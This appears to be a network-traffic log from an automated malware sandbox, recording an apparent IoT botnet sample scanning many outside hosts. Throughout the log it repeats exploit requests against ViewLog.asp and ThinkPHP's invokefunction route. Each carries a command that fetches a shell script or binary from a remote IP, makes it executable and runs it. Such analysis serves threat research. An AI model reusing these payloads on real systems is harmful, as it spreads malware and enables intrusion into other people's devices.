                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:11.635433912 CEST711INHTTP/1.0 404 Not Found !!!
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        869192.168.2.235906831.136.182.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.348139048 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:14.418998003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.562303066 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:32.592490911 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:57.165230989 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        870192.168.2.233994485.105.50.168080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.368520021 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:11.712898016 CEST274INHTTP/1.1 404 Not Found
                                                        Cache-Control: must-revalidate,no-cache,no-store
                                                        Content-Disposition: inline;filename=f.txt
                                                        Content-Type: application/json
                                                        Connection: close
                                                        Data Raw: 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 34 2d 31 34 54 31 34 3a 33 37 3a 31 31 2e 35 33 38 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 22 7d
                                                        Data Ascii: {"timestamp":"2024-04-14T14:37:11.538+00:00","status":404,"error":"Not Found","message":""}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        871192.168.2.235800862.29.25.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.371201992 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        872192.168.2.234672695.213.134.4680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.607251883 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:11.916682005 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        873192.168.2.235967495.230.223.14280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.635997057 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:11.968328953 CEST450INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:11 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        874192.168.2.235704231.136.247.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.646311045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:12.595293999 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:14.514915943 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.514460087 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.193280935 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:41.551131964 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:13.546992064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        875192.168.2.233735095.86.78.18680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.649804115 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:12.723530054 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        876192.168.2.235691095.177.167.5780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.677242041 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:13.619303942 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:15.954751968 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:20.562190056 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:29.776933908 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:48.974239111 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:38:25.833410978 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        877192.168.2.233992662.29.94.148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.692092896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        878192.168.2.233356694.123.72.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.711318970 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        879192.168.2.235946695.86.104.1608080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:11.719063997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        880192.168.2.2335938112.164.61.9980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.205565929 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:12.589855909 CEST243INHTTP/1.0 404 Not Found
                                                        Content-type: text/html
                                                        Date: Sun, 14 Apr 2024 14:37:12 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL was not found</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        881192.168.2.2346532112.173.225.3780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.254502058 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:12.565207958 CEST512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:37:13 GMT
                                                        Server: lighttpd/1.4.54
